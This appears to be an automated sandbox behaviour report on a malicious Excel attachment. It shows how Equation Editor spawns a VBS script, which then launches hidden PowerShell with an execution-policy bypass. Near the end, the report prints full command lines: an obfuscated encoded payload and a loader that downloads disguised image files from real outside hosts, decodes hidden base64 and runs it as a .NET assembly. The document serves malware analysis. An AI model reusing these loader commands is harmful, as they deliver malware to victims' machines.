Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: SHREE GANESH BOOK SERVICES-347274.xlsStream path 'MBD00027431/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: SHREE GANESH BOOK SERVICES-347274.xlsStream path 'MBD00027432/CONTENTS' entropy: 7.95252481957 (max. 8.0)
Source: SHREE GANESH BOOK SERVICES-347274.xlsStream path 'Workbook' entropy: 7.99702573529 (max. 8.0)
Source: 6D330000.0.drStream path 'MBD00027431/CONTENTS' entropy: 7.9671168067 (max. 8.0)
Source: 6D330000.0.drStream path 'MBD00027432/CONTENTS' entropy: 7.95252481957 (max. 8.0)
Source: 6D330000.0.drStream path 'Workbook' entropy: 7.99832315808 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 876Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 568Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3037Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2169Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3212Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep count: 3037 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep count: 2169 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-460
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-414
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B056B mov edx, dword ptr fs:[00000030h]9_2_036B056B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDg
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtredgdgtrelwdgtre5dgtredkdgtrendgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtredcdgtrengdgtre5dgtredkdgtremdgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtrehydgtreygbzdgtref8dgtrebgbvdgtrehydgtrebwbfdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrejwdgtrepdg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.hgus/6653/69.442.29.19//:ptth' , '1' , 'c:\programdata\' , 'suu','regasm',''))} }
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtredgdgtrelwdgtre5dgtredkdgtrendgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrexwb1dgtrehdgtredgtrezdgtrebhdgtrehqdgtrezqbkdgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtredcdgtrengdgtre5dgtredkdgtremdgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtrehydgtreygbzdgtref8dgtrebgbvdgtrehydgtrebwbfdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dg